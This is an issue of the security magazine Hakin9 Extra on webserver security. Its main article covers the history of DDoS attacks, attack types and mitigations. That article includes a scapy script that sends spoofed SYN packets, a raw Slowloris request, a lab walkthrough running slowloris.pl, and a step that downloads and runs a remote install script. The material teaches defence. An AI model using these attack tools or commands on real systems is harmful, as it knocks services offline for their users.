
Atola Insight

That's all you need for data recovery.


Atola Technology offers Atola Insight, the only data recovery device that covers the entire data recovery process: in-depth HDD diagnostics, firmware recovery, HDD duplication, and file recovery. It is like a whole data recovery lab in one tool. This product is the best choice for seasoned professionals as well as start-up data recovery companies.

Case management
Real time current monitor
Firmware area backup system
Serial port and power control
Write protection switch

If our FREE antivirus for home outperforms competitors' end-point products, imagine what our business solutions can do for you.

The most popular antivirus in the world. www.avast.com/best-antivirus

Managing: Michał Wiśniewski m.wisniewski@software.com.pl
Senior Consultant/Publisher: Paweł Marciniak
Editor in Chief: Grzegorz Tabaka grzegorz.tabaka@hakin9.org
Art Director: Marcin Ziółkowski
DTP: Marcin Ziółkowski www.gdstudio.pl
Production Director: Andrzej Kuca andrzej.kuca@hakin9.org
Marketing Director: Grzegorz Tabaka grzegorz.tabaka@hakin9.org
Proofreaders: Dan Dieterle, Michael Munt, Michał Wiśniewski
Top Betatesters: Ruggero Rissone, David von Vistauxx, Dan Dieterle, Johnette Moody, Nick Baronian, Dan Walsh, Sanjay Bhalerao, Jonathan Ringler, Arnoud Tijssen, Patrik Gange
Publisher: Hakin9 Media Sp. z o.o. SK, 02-682 Warszawa, ul. Bokserska 1, www.hakin9.org/en

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trademarks presented in the magazine were used only for informative purposes. All rights to trademarks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used a program by ... Mathematical formulas were created by Design Science MathType.

DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear hakin9 Extra followers,


This month's issue of hakin9 Extra is totally devoted to webserver security. Recently, webserver security has re-surfaced as one of the hottest topics on the IT security market. In this issue we have covered both the most obvious and the not-so-obvious topics that fall within the scope of webserver security: Web Application Firewalls, DDoS attack mitigation techniques, webserver SED filtering, and sockets and TCP/IP. I genuinely hope that you will be satisfied with the content and the quality of the articles presented. Next month, we are preparing an issue totally devoted to Snort. I hope that you will enjoy that one as well.

Michał Wiśniewski, hakin9 Extra m.wisniewski@software.com.pl

Get trained today through our exclusive 7-month hands-on course. Gain access to our complex LAB environment, exploiting vulnerabilities across many platforms. Receive a trainer dedicated to you during the 7 months. 10 different hands-on engagements, two different certification levels.

MONTH 1

Vulnerability Assessment - level 1
Vulnerability Assessment - level 2
Vulnerability Assessment - level 3

MONTH 2

Network Penetration Testing - level 1
Network Penetration Testing - level 2

MONTH 3

Network Penetration Testing - level 3

MONTH 4

Web Application Penetration Testing - level 1
Web Application Penetration Testing - level 2

MONTH 5

Web Application Penetration Testing - level 3

MONTH 6

Certification Exam 1 - Certified Cyber 51 Pentesting Professional - (CC51PP)

MONTH 7

Certification Exam 2 - Certified Cyber 51 Pentesting Expert - (CC51PE)

Hakin9 EXTRA

8. DDoS Attack and Mitigation Techniques


By Valerio Sorrentino
Nowadays the most common reason that criminals attack internet services is still to extort money, ensuring that targeted systems will no longer be attacked. DDoS attacks cost the average enterprise company about five million euro for a 24-hour outage, and attacks can be performed from anywhere in the world with total anonymity, using software such as Tor. This software was created to defend citizens from network surveillance that threatens personal freedom and privacy. However, criminals can also use it to hide their physical location by bouncing a network signal around a number of computers.

14. Understanding and Mitigating Distributed Denial of Service Attacks


By Hari Kosaraju
The mechanism by which a TCP connection is established is called a Three Way Handshake. During this process, the client first sends the server a TCP SYN packet. In response, the server sends a SYN ACK packet to the client. When the client receives this SYN ACK packet, it sends an ACK packet to the server. At this point, the TCP connection is considered established between the client and the server. In a Denial of Service attack, there are two ways that an attacker can interrupt this process. They can send a TCP SYN packet to the server with a spoofed source IP address, so that the server never receives an ACK: the spoofed source IP doesn't know anything about this TCP connection and will not send the TCP ACK to the server. The other way is to use a legitimate source IP but never send the TCP ACK packet. By performing this trick repeatedly, the attacker tricks the server into maintaining numerous half-open connections, exhausting the connection queue. Once this connection queue is exhausted, no new legitimate clients will be able to connect to the server [4].

20. Web Application Firewall From Planning to Deployment


By Yen Hoe Lee and Fernando Perez
The WAF tuning process requires the WAF to be set to monitoring mode. In this mode, all web request traffic for the application is allowed through the web application firewall without being blocked; the WAF is set to capture and report violations. The WAF implementation team needs to review these violations and choose either to accept them as legitimate traffic or to tweak the rules so that they no longer trigger violations. This process is repeated until all violations are addressed. When a positive model is used, the tuning effort will always be higher. The complexity of the application also impacts the level of effort needed; in this case, the complexity is determined by the number of inputs, the types of input expected, and how dynamically the application pages are generated.

26. Web Server SED Filtering


By Colin Renouf
One important thing to note, however, is that C represents strings as character arrays, usually with 8-bit ASCII characters, terminated with a NULL character. Java uses Unicode and, under the covers, stores the length of the String. The machine may represent the individual bytes in one ordering and the network in another, i.e. big endian or little endian. These different representations can be used by the clever hacker to produce an attack that makes use of the data representation conversions that take place on the boundaries, bypassing security in one layer by relying on the conversion going on behind it to create an attack string. We will cover this in another article; but the thing to understand is that each layer must have its own defences and not rely entirely on what sits in front of it. Many attacks come from within the external firewalls, e.g. from staff, so even in a simple case where the same technologies are used throughout and no conversion occurs, defences are still needed in each layer.

32. Web Application Firewalls, how tough are they now?
By Manfred Fereira
If the reader is running the Siege application for the first time, siege.config must be run in order to generate the configuration file. If the reader wants to test a partial page or a group of pages, one of the parameters to pass is the list of URLs; for these tests we will provide just two URLs. For better performance and analysis, however, the principal URLs should be included: the more URLs in the list, the better notion the reader will have of the actions taken by the WAF and the load balancer. Edit the file /etc/urls.txt with the vi command, and input as many URLs as you can, always associated with the web site that you want to test. Commands are executed in the Backtrack distribution, on the command line: # vi /etc/urls.txt

36. Sockets and TCP/IP - Core of an Attack


By Colin Renouf
With the sockets API, from a client perspective, a socket is declared as a particular type; is opened, or more accurately connected, using a connect call; is then written to or read from; and is finally closed; all much like reading or writing a file. From the server perspective, the server will bind the socket to a port, listen on that port for requests, and accept each request as it comes in. Where only a single packet is to be handled, simpler sendto and recvfrom calls are available. The API suite also contains functions to look up hosts by name and to convert between the host byte representation and the network representation. All of these are documented heavily elsewhere and are generally well understood.

40. Web Server Log Analysis - Detecting Bad Stuff Hitting Your Web Server
By Kim Halavakoski
Web servers on the Internet are under constant attack. Defending your web server requires vigilant response times and in-depth log analysis in order to detect, remediate and track ongoing attacks. WAFs are today a common tool in defending high-profile websites. One often forgotten aspect of any technology is log analysis: products and technologies are often installed as a countermeasure to observed attacks, but the really valuable part is usually forgotten. Without properly analysing the logs, defending against the ever-changing threat landscape and evolving attack methods can be challenging. This article will show some basic methods, tools and products for analysing logs and detecting the bad stuff targeting your website.

46. Special Edition for Forensic Professionals: The Most Advanced and Effective New Tools from Atola Technology
By the ATOLA Team
The Atola Forensic Imager is a high-quality professional tool designed to meet all expectations in advanced forensic operations. It is an all-in-one solution that easily works with damaged or unstable hard disk drives, combining a fast imager with strong data recovery capabilities for creating accurate forensic images. The powerful Atola Imaging Software is bundled with the Atola DiskSense Ethernet Unit, which utilizes the most efficient interface connections. This professional tool has been developed with the ability to customize every step: key parameters can be adjusted during the imaging process to make it more effective and successful for each specific case. Quick and accurate erasing of hard drives works at maximum speed, using any specified HEX pattern to overwrite the sectors; the tool can also execute the Security Erase function and perform Zero-Fill, NIST 800-88 and DoD 5220.22-M compliant wiping. The Case Management System automatically records all important data, such as date, time and hash values, in one place; archives of all past cases are stored on the host PC. The automatic password removal function removes any user- and master-level ATA password from a locked hard drive and displays the password to the technician.


DDoS Attack and Mitigation Techniques


Valerio Sorrentino

This overview of DDoS threat scenarios will give you the tools needed to understand these attacks and to use this knowledge independently in order to avoid falling victim to them. This easy-to-follow, practical approach is given from a professional standpoint and is intended to be used by students of all levels, researchers, security professionals and engineering teams, as well as entities involved in Incident and IT Resource Management.

Once you have read this article, you will be able to understand the following concepts and technologies:

The history of denial-of-service attacks during the last decades.
Reasons behind attacks, such as ransom, hacktivism and business impact.
Definitions of, and differences between, various types of denial-of-service attacks.
Prevention, detection and mitigation of denial-of-service attacks.
How to test your infrastructure and configure anti-DoS programs and tools.

History
Denial-of-service attacks have been around for decades, but what was the first DoS attack? The incident took place at CERL, the Computer-based Education Research Laboratory at the University of Illinois. At the age of thirteen, David Dennis executed the -ext- TUTOR command on the PLATO system in order to put all the terminals offline. It worked, and he never got caught. Over the years, however, single-source DoS attacks turned out to be less effective as more and more people became aware of them. This led to attacks from multiple sources, which have been aptly named Distributed Denial of Service (DDoS) attacks. The first well-documented DDoS attack seems to have taken place against the University of Minnesota in August 1999, using Trinoo, a DDoS tool. It was deployed on at least 227 systems, of which at least 114 were on the Internet, in order to flood a single computer. The target was unavailable for over 48 hours.

In the beginning, the attacker source addresses were not spoofed, and the IT team could contact those launching the attacks in order to disinfect their systems. It did not take long for the attackers to change the tool code so that they could spoof different IP addresses. These days, both DoS and DDoS attacks have become more sophisticated, as shown in the following examples. The first DDoS attacks well publicized in the press took place in February 2000. On February 7th, Yahoo! was the victim of a DDoS attack, during which the internet portal was inaccessible for three hours. On February 8th, CNN, eBay, Amazon and Buy.com were all hit by DDoS attacks that caused them either to stop functioning completely or to slow down considerably. On February 9th, ZDNet and E*Trade experienced DDoS attacks as well. Analysts have estimated that during the period that Yahoo was down, it withstood a loss of e-commerce and advertising revenue that amounted to about 400,000. Amazon.com considers its loss to amount to around 500,000 subsequent to its widely publicized attack, which brought its web servers down for more than ten hours. IT experts estimate that for a company earning 6.5 billion euro monthly in online trades, any downtime would produce an enormous financial impact, derived also from loss of reputation.

2002 - DNS Root Server Attacks
The largest DDoS attack ever was also the most significant to date, due to the fact that it threatened the very existence of the Internet itself. The thirteen root DNS servers, which propagate changes to all the other servers, came under attack on October 21st, 2002. It is considered by many to have been an attack on the Internet itself, since it hit the Internet at its most vulnerable point.



The attack lasted over an hour and was well coordinated, with all thirteen DNS servers coming under fire at the same time. The amount of data thrown at the servers in total was over 900 Megabits per second and comprised various types of protocols, including TCP and UDP. The fallout of the attack was substantial. Although the servers did not crumble under the load, there were so many attack queries that some genuine queries from around the world timed out. In many ways, the experience was a victory for the DNS servers: because they were massively over-provisioned, they were able to cope successfully with the high volume of traffic thrown at them. It validated the principle of over-provisioning in order to account for future attacks.

2007 - DNS Attacks
On February 6th, 2007, six of the thirteen DNS servers were once again attacked in an attempt to bring the Internet down. The first wave of the attack lasted 2.5 hours. After a gap of three hours, the servers were hit once more for another three hours. Nevertheless, this time the engineers who worked on the systems protecting the DNS servers had learned critical lessons from the first attack in 2002. A new technology, Anycast, had been developed, which allowed the DNS servers to mitigate the effects of this type of attack. Unfortunately, two of the servers lacked the newly installed technology and, in turn, were taken down by the attacks. Essentially, the 2007 attacks were a positive experience: the engineering teams had demonstrated that they had the ability to withstand a coordinated DDoS attack. The attacks were believed to have arrived from the Asia-Pacific region. However, they were most likely carried out by zombie computers used by unsuspecting users and, therefore, could have come from anywhere. It was discovered that end users could help to prevent their systems from being hijacked by changing the default passwords on their home routers. We all have numerous family members who continue to use their default passwords even after we have informed them of the dangers of doing so. For obvious reasons, the adoption of this recommendation is still quite low worldwide.

The year 2010 marks the point when distributed denial-of-service (DDoS) attacks broke through the 100 Gbps traffic barrier. DDoS became a by-word for any politically motivated attack that year. Arbor Networks' sixth annual worldwide infrastructure security report announced that the attacks had become mainstream, while numerous high-profile attacks were launched against popular internet services as well as other well-known targets. According to Arbor Networks, 5% of the world's leading data centres deal with over 500 DDoS attacks every month. Currently, cloud services are particularly targeted; an analysis conducted by Alcatel-Lucent has shown that cloud security is what needs improving most.

Aim of the Attack
Nowadays the most common reason that criminals attack internet services is still to extort money, ensuring that targeted systems will no longer be attacked. DDoS attacks are costing the average enterprise company about five million euro for a 24-hour outage, and attacks can be performed from anywhere in the world with total anonymity, using software such as Tor. This software was created to defend citizens from network surveillance that threatens personal freedom and privacy. However, criminals can also use it to hide their physical location by bouncing a network signal around a number of computers.

The Russian Business Network (RBN) extorted potential clients into using its specialized hosting services by means of DDoS attacks, as well as by controlling botnets such as Storm. Apart from the obvious example of an RBN hired gun, the distributed denial-of-service attack on Estonia in May 2007 virtually shut the nation down. Furthermore, these criminal organizations use denial-of-service attacks in order to divert the attention of the IT team, forcing it to deal with the attack at hand. This is the perfect moment for the criminal to launch a real attack on company or government entities.

Hacktivism
Hacktivism can refer to politically constructive forms of civil disobedience. It can pertain to various types of protest, whether anti-capitalist or political. Critics have suggested that DoS attacks are an attack on our free speech, have unintentional results, waste resources and could possibly lead us to a DoS war that will be won by no one. An example is the DDoS attack against the FBI: the FBI site was down for a brief period after only seven minutes of attack. This attack was feasible due to the number of people that participated in protest against internet censorship. Anonymous, or anon, is one of the world's most well-known hacktivist collectives, especially after launching DDoS attacks on the American, Russian, Mexican and Polish governments. As demonstrated in an extract posted by Anonymous on Pastebin in February 2012, the battle is fought by Anonymous at various levels; it consists not merely of trivial DDoS attacks, but also of making the government conscious of its own mistakes and waking up the citizens when laws infringe on their privacy and civil liberties:

"To protest SOPA, Wallstreet, our irresponsible leaders and the beloved bankers who are starving the world for their own selfish needs out of sheer sadistic fun, on March 31, anonymous will shut the Internet down. Who sacrifices freedom for security deserves neither. Benjamin Franklin. We know you won't listen. We know you won't change. We know it's because you don't want to. We know it's because you like it how it is. You bullied us into your delusion. We have seen you brutalize harmless old women who were protesting for peace. We do not forget because we know you will only use that to start again. We know your true face. We know you will never stop. Neither are we. We know. We are Anonymous. We are Legion. We do not Forgive. We do not Forget. You know who you are, Expect us."

The rise of groups like Anonymous and LulzSec, as well as continuous cyber-wars, has finally exposed the issues of cybersecurity. The risk is real, and it is progressively shifting into political and military action.

Cyber-war
A cyber-war is a new way for military groups and terrorists to wage war via the internet. In this way, war no longer has to involve physical weapons, since it can be conducted from computers located anywhere in the world. A cyber-war DDoS attack is able to stop critical infrastructure of the targeted country, such as banks, hospitals, media and transportation systems.


For example, US websites came under a DDoS attack from a botnet consisting of about 20,000 nodes, based on the MyDoom worm. The agents launched a mix of ICMP ECHO packets, UDP packets and HTTP GET requests.

Definitions
In a nutshell, DoS and DDoS attacks are executed by sending many crafted requests to targeted systems, consuming resources such as processing cycles, memory and network bandwidth, and preventing the systems from providing the intended service or communication to legitimate users. Perpetrators of these attacks usually target sites or services hosted on web servers, credit-card payment gateways, e-mail servers and root DNS servers. What is the difference between DoS and DDoS attacks?

DoS: Denial-of-Service attacks are defined as resource-exhaustion flooding attacks and logic attacks from one source. This also makes the geolocation of the attacker easy to trace and, for that reason, the attack relatively easy to prevent. Attacks based on resource-exhaustion flooding cause the server's or network's resources to be consumed to the point where the service no longer responds, or its performance is reduced. Logic attacks take advantage of security vulnerabilities in order to crash a server or to drastically reduce its performance.

DDoS: Distributed-Denial-of-Service attacks originate from more than one source and multiple locations at the same time. The tools used for denial-of-service attacks tend to create different types of malicious or legitimate traffic that, when clustered together across hundreds and thousands of other computers, create a massive attack, thus overwhelming the target server. The term distributed stems from a battery of zombie systems, in many cases infected with malware, that is often used in order to make the aggression effective.

The users are typically unaware that their computer has been compromised by malicious code after they have accessed an infected web site or have inadvertently run malware programs on their computer, such as a virus. This is the case of systems that, without their owners' cognizance, have become part of a botnet and that attackers can use to issue commands in order to trigger a DDoS attack toward a website. Since the malicious packets come from several IP addresses, DoS defenses based on monitoring the volume of packets coming from a single address or network would fail, because the attacks could come from all over the world. For example, instead of receiving a thousand gigantic pings per second from a single attacking node, the victim could receive one ping per second from thousands of attacking sources.

Figure 1. DDoS Attack Schema

Typology
The following are some examples of denial-of-service attacks:

Ping-Flood Attacks
A Ping-Flood attack is the most rudimentary of all attacks and is actually considered a brute-force attack that utilizes ICMP Echo Request, also known as ping, packets. These require the target to have a smaller bandwidth than the source, but may also be launched from a single source. A sufficient number of machines are compromised and then turned into zombies. They are subsequently used to ping the victim, who is unable to operate when the sum of all the attack bandwidths is greater than that of the victim. Blocking becomes improbable when the ping source addresses are spoofed, since one does not know which infected machine is attacking. In contrast, the attacker brings down the target's total network, which might be an undesired result. Significant resources are necessary to mount this kind of attack, which could be challenging to assemble. However, if the target is working with their ISP, the attack can be blocked.

SYN-Flood Attacks
SYN-Floods were developed from the Ping-Flood. After all, they say necessity is the mother of invention. In a SYN-Flood attack, the attacker takes advantage of the protocol by sending the server many SYN packets. Since the server must handle every packet as if it were a connection request, it responds with a SYN-ACK. The attacker can choose not to respond to the SYN-ACK and, in turn, the server is left with a half-open connection. Nonetheless, the server could block subsequent packets from the attacker's IP address and therefore end the attack prematurely.

Figure 2. SYN Flood UML Diagram

Another option is for the attacker to spoof the client's IP address. The server will then respond to that IP address, but since a connection has not been initiated, the client will simply drop the SYN-ACK. The server is then left waiting for a response while these half-open connections use up its resources. No new connections can be made after all the resources are consumed, regardless of their legitimacy. The result is a successful attack.
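A minimal, lab-only sketch of the spoofed-SYN trick just described, assuming Python with scapy, root privileges and an isolated test network; the target address is a placeholder, and a real attacker would loop indefinitely rather than send a small burst:

from random import randint
from scapy.all import IP, TCP, send

TARGET = "192.0.2.10"   # placeholder: a test server in an isolated lab

def spoofed_syn():
    # forge a random source, so the SYN-ACK goes nowhere and the
    # target is left holding a half-open connection
    src = "10.%d.%d.%d" % (randint(0, 255), randint(0, 255), randint(1, 254))
    return IP(src=src, dst=TARGET)/TCP(sport=randint(1024, 65535), dport=80, flags="S")

send([spoofed_syn() for _ in range(100)], verbose=False)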




The Slow Loris Attack
A Slow Loris attack holds the connection open at layer 7 by sending incomplete HTTP requests to the web server. The connection is opened by the server, which then waits to receive a complete header. Instead, it receives only bogus header lines, which keep the connection allocated.

Figure 3. Slow Loris Attack

Example:

POST /somepage.com HTTP/1.1\r\n
Host: some_url_or_other.com\r\n
User-Agent: Mozilla/4.0 \r\n
Content-Length: 42\r\n
X-a: b\r\n

Notice that everything up to the final line is legitimate. Instead of finishing with an additional \r\n, the request should finish with X-a: b\r\n\r\n. Many web servers wait five minutes by default, so a single incomplete request ties up one resource for up to five minutes. In many cases, it takes an attacker very little time to use up the remaining resources for new connections. In order to keep each resource busy, a new header line with the missing CRLF is sent again and again. Because this can be varied, writing Intrusion Detection signatures for it is difficult without also stopping legitimate traffic. Therefore, with a single packet, an attacker can keep a connection busy for up to five minutes.

Detection, prevention and mitigation methods:

Scalability and Overprovisioning
Monitoring Network Traffic
Network Firewall
SYN Cookies
Load Balancers
Web Application Firewall

Scalability and Overprovisioning
Protecting a server against denial-of-service attacks, DoS or DDoS, is an arduous endeavor. Using a server with generous resources, such as CPU and memory, is perhaps the simplest measure, together with building the server application to scale up well. If feasible, it is recommended to use a distributed model to maintain redundancy for critical services and applications. It is also very important to provide scalability of the monitoring tools, assuring that they continue to work during the attack.

Monitoring Network Traffic
In order to understand normal network traffic patterns, companies should regularly collect sample packets, as well as other pertinent information, from switches, routers and other devices in order to establish a baseline for normal traffic. It is necessary to know what sort of traffic comes in, monitoring it over a period of six months. This information should be incorporated into a correlation engine for threat detection, alerting and reporting, and can be used to avoid future attacks.

Network Firewall
Firewalls use mechanisms such as black-listing IP addresses and applications in order to defend servers from DoS attacks. While network firewalls can halt classic DoS attacks like the Ping of Death or Land, it is virtually impossible for a common network firewall to distinguish, and therefore stop, an advanced DDoS attack. In addition, network security devices using stateful inspection technology can be quite vulnerable to DDoS attacks: attackers know that these security appliances are exposed, so they attack them by overloading the TCP stack in order to stop them. Nonetheless, network firewalls can capture evidence of attacks, such as source and destination IP addresses, protocol and packet length. This information is important for the ISP in order to filter out the abnormal traffic.

Load Balancers
It is conventional wisdom that if your infrastructure is behind a hardware load balancer, then you are not vulnerable to DoS/DDoS. In fact, a DoS attack can pass straight through load balancers if they are not properly configured. Delayed binding, also known as TCP Splicing, must be activated in order to protect the infrastructure against a DoS attack. Delayed binding permits the load balancer to perform an HTTP request header completeness check, ensuring that your web server will never receive incomplete requests. Delayed binding is a very effective way to protect against a Slow Loris attack.

SYN Cookies
SYN Cookies have proved to be one method of protecting against SYN-Flood attacks, by eliminating the half-open connection state that the server would otherwise keep. Instead of storing the information locally, the server embeds the new connection information in the TCP sequence number it passes back to the client in the SYN-ACK packet. Once the server receives the client's ACK response, it reconstructs the entry for the SYN queue, since the ACK holds the sequence number incremented by one. In this way, the attack is unable to dominate all of the resources and is therefore reduced to the level of a Ping-Flood attack (a simplified sketch of the encoding appears at the end of this section).

Web Application Firewalls
By fending off both layer 4 and layer 7 DoS attacks, WAFs allow servers to continue providing services to applications without a degradation in performance. WAFs automatically learn application structure, such as application URLs, methods, parameters and cookies, in order to precisely detect attack patterns. This information is used to create a traffic baseline, also known as a white list of acceptable user behavior.
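To make the SYN Cookies subsection above concrete, here is a deliberately simplified Python sketch of the encoding idea; real TCP stacks fold a time counter and MSS bits into the cookie, so treat this as the principle only, not an actual kernel scheme:

import hashlib
import os

SECRET = os.urandom(16)   # per-server secret

def syn_cookie(src, sport, dst, dport, client_isn):
    # derive our initial sequence number from the connection 4-tuple
    material = ("%s%d%s%d" % (src, sport, dst, dport)).encode()
    h = hashlib.sha256(SECRET + material).digest()
    return (int.from_bytes(h[:4], "big") + client_isn) & 0xFFFFFFFF

def verify(src, sport, dst, dport, client_isn, acked_seq):
    # the client's ACK must echo our cookie + 1; nothing was stored locally
    return acked_seq == ((syn_cookie(src, sport, dst, dport, client_isn) + 1) & 0xFFFFFFFF)

cookie = syn_cookie("198.51.100.7", 40000, "192.0.2.10", 80, 12345)
print(verify("198.51.100.7", 40000, "192.0.2.10", 80, 12345, (cookie + 1) & 0xFFFFFFFF))

Because the state lives in the sequence number itself, a flood of spoofed SYNs no longer consumes the server's connection queue.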



Live Tests
Note that I accept no liability resulting from the use of the programs mentioned below; DoS and DDoS attacks constitute law violations around the globe. Furthermore, it is recommended to use a virtual machine with no access to the internet or any internal LAN in order to avoid any problems.

Step 1: Set up a web server
In order to install the Apache web server on Linux, first log on to your Linux machine. Then open a terminal and enter this command:

sudo apt-get install tasksel

Figure 4. tasksel installation output

Once the installation is complete, type from the terminal:

sudo tasksel

Figure 5. tasksel software selection output

Note that during the installation you will be asked to enter the password for MySQL (the default username is root). To confirm that your web server is working, open a browser on the same machine and type localhost; otherwise, from another machine, enter the Linux machine's internal IP address into the URL bar. A default web page should appear. That's all, folks! In Ubuntu you can install LAMP with just one click; if your Linux machine uses a different package manager, use that package manager's syntax to install it. Note that Apache is called httpd in Red Hat and some other repositories.

Step 2: Attack the web server via the Slowloris attack
First, download the Slowloris script from Pastebin or SourceForge. After downloading the script, enter this command to start it:

perl slowloris.pl -dns <WebServerIPaddress>

Note that this script requires the Perl interpreter with the modules IO::Socket::INET, IO::Socket::SSL and Getopt::Long. In case you do not already have these modules, you can install them using CPAN with the following commands:

perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'

In a browser window, attempt to connect to the Apache web server hosted on the Linux machine. If you already have a window open to the site, press F5 or the refresh button in the browser. Are you able to connect? After just 30 seconds, the following appeared when I was requesting the server page (the small Python probe after this walkthrough automates exactly this check):

Figure 7. Web Server output after DoS attack

Step 3: Stop the Slowloris attack
In order to block the Slowloris attack you can install DDoS Deflate. To install the program, enter the following command to download the installation script:

wget http://www.inetbase.com/scripts/ddos/install.sh

Afterwards, change the permissions of the file in order to execute it:

chmod 0700 install.sh

Finally, launch the installation with this command:

./install.sh

If it doesn't work out, it is simple to uninstall too. To uninstall, first download the uninstall script:

wget http://www.inetbase.com/scripts/ddos/uninstall.ddos

Then change the permissions of the file in order to execute it:

chmod 0700 uninstall.ddos

Then launch the uninstall program by entering this command:

./uninstall.ddos
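To automate the browser-refresh check from Step 2, here is a small availability probe of my own (not part of the original toolset), assuming Python 3 and a lab server address you substitute for the placeholder:

import time
import urllib.request

URL = "http://192.168.1.10/"   # placeholder: your lab web server

while True:
    t0 = time.time()
    try:
        urllib.request.urlopen(URL, timeout=5)
        print("OK   %.2fs" % (time.time() - t0))
    except Exception as exc:   # timeout or connection refused during the attack
        print("FAIL %s" % exc)
    time.sleep(3)

During a successful Slowloris run, the OK lines should turn into FAIL lines within seconds.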

I have found that these mitigation techniques will stop 90% of the attacks that currently exist. Naturally, firewall rules and/or ACL rules configured at the router or switch level also help.




Conclusion

Attacks are increasing in sophistication and moving up the OSI model, from brute-force attacks at the network layer to more refined attacks at the application layer: from the most elementary cable-cutting attack at the physical layer, through attacks such as Ping-Floods and SYN-Floods at the network and transport layers, and continuing up to the application layer, giving attackers various options. At the same time, there is an increase in botnets as well as in sophisticated command and control (C&C). Launching brute-force attacks like SYN-Floods or reflected attacks is simply the easier option, because they work against the majority of targets. Attacks such as those on Facebook and Twitter are becoming progressively more common. In fact, this quarter, as reported by Prolexic, DDoS attacks were evenly spread across all vertical industries, including financial services, e-commerce, SaaS, payment processing, travel/hospitality and gaming. As in previous attack reports, China (33%) is the top source country for distributed denial-of-service attack traffic. Moreover, this quarter it is joined at the top of the list by Thailand (23%) and the United States (8%), although the United States, the UK and Hong Kong consider denial-of-service attacks the biggest security risk of them all.

I believe that it is necessary to perform analysis of attack patterns in order to rapidly identify upcoming attacks, and to share lessons learned between different incident response teams. It is therefore extremely important to subscribe to third-party intelligence service providers and to participate in industry security groups or forums (e.g. CERT). Nevertheless, in order to discriminate suspicious traffic from legitimate traffic and to deal with botnets, security professionals must have hands-on expertise: they must manage and defend against DDoS attacks, as well as infiltrate and stop DDoS command-and-control servers. Unless companies learn how to read that data and take appropriate countermeasures, even the best monitoring and reporting statistics are completely and utterly useless.

References and Resources


http://www.platohistory.org/blog/2010/02/perhaps-the-first-denial-of-service-attack.html
http://www.prolexic.com/
http://deflate.medialayer.com/
http://www.rfxn.com/projects/

Valerio Sorrentino
CISM, CISA, ISO 27001 Lead Auditor and CCNA, Valerio is an author, trainer and security consultant who has been working in the IT industry for over 12 years for defence, space, financial, telecommunications and manufacturing companies. His extensive experience includes the design, development and implementation of enterprise applications, infrastructure and security solutions in order to achieve organizational business objectives. Valerio performs information security demonstrations and training for both technical and non-technical audiences. He is also a member of numerous industry associations, such as the Cloud Computing Community, itSMF, ISACA and Clusit. This article marks his 4th collaboration with Hakin9 Magazine.





Understanding and Mitigating Distributed Denial of Service Attacks


Hari Kosaraju

One of the most common and costly cyber attacks on the Internet is the Distributed Denial of Service (DDoS) attack. Enterprises across the globe are scrambling to prevent their critical systems from being taken down by amateur hackers using readily available DDoS toolkits. DDoS attacks have been accelerating lately, and an adequate solution for preventing them still evades security researchers. This article discusses the technical details of how a DDoS attack occurs and offers steps on how such attacks can be mitigated.
A Denial of Service attack is defined as an attack in which the attacker disrupts access to a server or application of the victim. Such attacks disrupt networks in many ways, but typically they deny access to a particular server or application service by bombarding it with an abnormal number or format of requests. Due to the lack of authentication of IP addresses, the addresses can be spoofed, and it becomes incredibly difficult to determine the source of the attack and stop it. To make matters worse, these attacks are usually orchestrated through the use of a number of zombie machines that are part of a command and control Botnet. These machines generate the malicious denial of service traffic; they are not owned by the attacker, but have been compromised through malware to be under the attacker's control. In most cases, the owners of these machines do not even know that they have been involved in an attack. When multiple hosts are involved in a coordinated Denial of Service attack, it is referred to as a Distributed Denial of Service (DDoS) attack. DDoS attacks are an unfortunately common occurrence on the internet and are growing at an alarming rate. A report by Arbor Networks shows that distributed denial of service attacks have now surpassed the 100 Gbps malicious traffic generation barrier [1]. What makes DDoS attacks so devastating is that it can be very simple for an attacker to set the attack up with the latest generation of toolkits, while it is very expensive for an organization to mitigate and/or trace back the DDoS attack to its source. This asymmetry makes it one of the most pressing security issues for enterprises globally.

During most DDoS attacks, spoofed or forged IP addresses are used, which makes it more challenging to trace the source of the attack. When an IP packet with a spoofed source address is responded to by a host, this causes IP backscatter. These backscattered packets will not be responded to. Researchers have looked at measuring backscatter and applying statistical analysis to determine how frequent DDoS attacks are on the internet. Their research, however, makes the assumption that the attacker chooses spoofed addresses randomly. This assumption is not necessarily valid, because attackers don't necessarily pick IP addresses randomly, and some IP packets destined for spoofed IP addresses are filtered before they ever reach their intended destination. Finally, the attacker may use a non-random reflector address to amplify their attack. One particular study estimated that there were about 12,805 DDoS attacks across 2,000 organizations in a three-week period [2]. In the first part of this article we will introduce various types of Denial of Service attacks and how they work at the protocol level. Next we will discuss what a Distributed Denial of Service attack is and how current DDoS toolkits work. Finally, we will discuss how to mitigate DDoS attacks from an enterprise and Internet Service Provider perspective.
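The backscatter idea above can be tasted with a short sketch of my own (not the cited study's method): an otherwise quiet address block should receive no SYN-ACKs at all, so unsolicited ones arriving there are likely echoes of spoofed-source attacks elsewhere. Assumes Python with scapy and a suitably quiet capture point:

from collections import Counter
from scapy.all import sniff, IP, TCP

backscatter = Counter()

def note(pkt):
    # a SYN-ACK we never asked for is probable backscatter
    if IP in pkt and TCP in pkt and pkt[TCP].flags == "SA":
        backscatter[pkt[IP].src] += 1

sniff(filter="tcp", prn=note, store=False, timeout=300)
print(backscatter.most_common(10))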

Types of Denial of Service Attacks

Denial of Service attacks can be classified as those that are executed on a local machine through a shell and those that are network based. Once a user has an account on a host system, they can launch any number of Denial of Service attacks.




Remember that a Denial of Service attack is one that denies services to legitimate users. Therefore, attacks such as forking processes repeatedly until an operating system's process limit is reached, creating files repeatedly to exhaust file handles, and filling up disk space with random data are all examples of local Denial of Service attacks. Once a system has been compromised such that a malicious user has shell access, any number of local attacks are possible [3].

